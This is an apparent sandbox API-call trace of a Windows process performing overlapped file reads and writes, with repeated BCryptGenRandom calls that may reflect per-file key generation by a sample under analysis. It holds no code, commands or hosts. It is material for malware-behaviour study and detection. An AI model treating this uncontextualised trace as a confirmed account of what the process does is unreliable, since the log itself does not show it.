[0116.225] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.243] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.325] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xe70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0116.325] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.336] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x61c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.336] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.337] CloseHandle (hObject=0x13c0) returned 1 [0116.338] free (_Block=0x1ff1e60) [0116.338] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.346] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.347] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.347] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0116.347] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.348] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.348] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0116.348] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.348] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.348] free (_Block=0x77d7a8) [0116.348] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.348] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.349] free (_Block=0x2071c20) [0116.349] free (_Block=0x2071d30) [0116.349] free (_Block=0x77d8b0) [0116.349] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0116.349] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.374] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x1240, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0116.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.398] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.399] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.399] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0116.399] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.400] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.400] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0116.400] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.400] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.400] free (_Block=0x77d7a8) [0116.400] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.400] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.400] free (_Block=0x2071c20) [0116.401] free (_Block=0x2071d30) [0116.401] free (_Block=0x77d8b0) [0116.401] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.401] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.405] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xfa0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.458] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xa4c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0116.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.458] CloseHandle (hObject=0x340) returned 1 [0116.459] free (_Block=0x3d70450) [0116.459] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0116.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0116.716] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0116.717] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.717] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.717] free (_Block=0x77d7a8) [0116.717] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.717] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.717] free (_Block=0x2071c20) [0116.717] free (_Block=0x2071d30) [0116.717] free (_Block=0x77d8b0) [0116.717] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.718] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0117.020] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0117.021] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.021] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.021] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0117.021] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.022] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.022] free (_Block=0x77d7a8) [0117.022] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.022] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.022] free (_Block=0x2071c20) [0117.022] free (_Block=0x2071d30) [0117.022] free (_Block=0x77d8b0) [0117.022] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0117.023] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0117.083] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x2466, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.090] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0117.105] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x820, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.176] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0xad0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.318] CloseHandle (hObject=0x3bc) returned 1 [0118.320] free (_Block=0x3d70450) [0118.320] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.331] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.331] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0118.331] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0118.332] free (_Block=0x77d7a8) [0118.332] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.332] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.332] free (_Block=0x2071c20) [0118.332] free (_Block=0x2071d30) [0118.332] free (_Block=0x77d8b0) [0118.332] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0118.332] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.343] CloseHandle (hObject=0x81c) returned 1 [0118.344] free (_Block=0x1ff1e60) [0118.344] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.352] ReadFile (in: hFile=0x3bc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1c80, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0118.363] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.405] WriteFile (in: hFile=0x81c, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1530, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.411] CloseHandle (hObject=0x340) returned 1 [0118.413] free (_Block=0x3e70008) [0118.422] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.422] CloseHandle (hObject=0x3bc) returned 1 [0118.423] free (_Block=0x3d70450) [0118.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.426] ReadFile (in: hFile=0x13c0, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x4f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0118.426] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.426] CloseHandle (hObject=0x13c0) returned 1 [0118.427] free (_Block=0x3db04c0) [0118.430] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.489] ReadFile (in: hFile=0x308, lpBuffer=0x3df0564, nNumberOfBytesToRead=0x52c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0530 | out: lpBuffer=0x3df0564*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0530) returned 1 [0118.489] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.490] CloseHandle (hObject=0x308) returned 1 [0118.492] free (_Block=0x3df0530) [0118.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.542] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.543] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.543] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.543] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.544] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.544] calloc (_Count=0x41, _Size=0x4) returned 0x77d858 [0118.544] free (_Block=0x3e305b8) [0118.544] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0118.544] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0118.544] free (_Block=0x2071c20) [0118.544] free (_Block=0x2071d30) [0118.544] free (_Block=0x77d858) [0118.545] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.545] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.592] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1efc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0118.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.603] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.604] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.604] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.604] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.605] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.605] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.605] free (_Block=0x3e305b8) [0118.605] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.605] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.605] free (_Block=0x77d8b8) [0118.605] free (_Block=0x2071c20) [0118.605] free (_Block=0x77d7a8) [0118.605] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.606] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.633] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x15b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.633] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.645] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc0a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.645] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.654] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.654] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x30efc30) returned 0x0 [0118.654] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.655] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.655] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x30ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x30ef970) returned 0x0 [0118.655] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0118.655] calloc (_Count=0x41, _Size=0x4) returned 0x77d7a8 [0118.655] free (_Block=0x3e305b8) [0118.655] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b8 [0118.655] calloc (_Count=0x82, _Size=0x4) returned 0x2071c20 [0118.656] free (_Block=0x77d8b8) [0118.656] free (_Block=0x2071c20) [0118.656] free (_Block=0x77d7a8) [0118.656] WriteFile (in: hFile=0x2f4, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0118.656] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.697] CloseHandle (hObject=0x2f4) returned 1 [0118.700] free (_Block=0x3ef0008) [0118.700] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18) returned 1 [0118.705] WriteFile (in: hFile=0x308, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0118.716] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x30efc0c, lpCompletionKey=0x30efc1c, lpOverlapped=0x30efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x30efc0c, 